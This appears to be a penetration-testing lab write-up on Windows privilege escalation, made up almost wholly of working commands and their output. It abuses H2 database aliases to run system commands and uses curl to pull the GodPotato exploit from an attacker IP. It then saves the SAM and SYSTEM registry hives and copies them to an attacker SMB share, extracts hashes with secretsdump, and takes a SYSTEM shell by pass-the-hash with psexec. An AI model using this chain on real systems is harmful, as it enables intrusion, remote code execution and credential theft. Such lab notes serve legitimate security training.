Priv Esc

The shell is mad funky so running commands out of H2

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami /priv").getInputStream()).useDelimiter("\\Z").next()');

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("curl 192.168.45.233/GodPotato-NET4.exe -o C:\\programdata\\GodPotato-NET4.exe").getInputStream()).useDelimiter("\\Z").next()');

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\programdata\\GodPotato-NET4.exe -cmd \"reg.exe save HKLM\\SAM C:\\programdata\\sam.bak\" ").getInputStream()).useDelimiter("\\Z").next()');

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\programdata\\GodPotato-NET4.exe -cmd \"reg.exe save HKLM\\SYSTEM C:\\programdata\\system.bak\" ").getInputStream()).useDelimiter("\\Z").next()');

$ impacket-smbserver share share/ -smb2support

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("net use \\\\192.168.45.233\\share").getInputStream()).useDelimiter("\\Z").next()');

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\programdata\\GodPotato-NET4.exe -cmd \"cmd /c copy C:\\programdata\\system.bak \\\\192.168.45.233\\share\" ").getInputStream()).useDelimiter("\\Z").next()');

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\programdata\\GodPotato-NET4.exe -cmd \"cmd /c copy C:\\programdata\\sam.bak \\\\192.168.45.233\\share\" ").getInputStream()).useDelimiter("\\Z").next()');

$ impacket-secretsdump -sam sam.bak -system system.bak local

$ impacket-psexec Administrator@192.168.241.66 -hashes :63f4402373a85ea2606ebbe11d871d27
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra

[*] Requesting shares on 192.168.241.66.....
[*] Found writable share ADMIN$
[*] Uploading file inNgTHUe.exe
[*] Opening SVCManager on 192.168.241.66.....
[*] Creating service SZvD on 192.168.241.66.....
[*] Starting service SZvD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
9c14b341d21d5489d6ef0f16c1bf51e3

C:\Windows\system32> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.241.66
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.241.254

PreviousEnumeration NextCredentials / Notes / LL

Last updated 6 months ago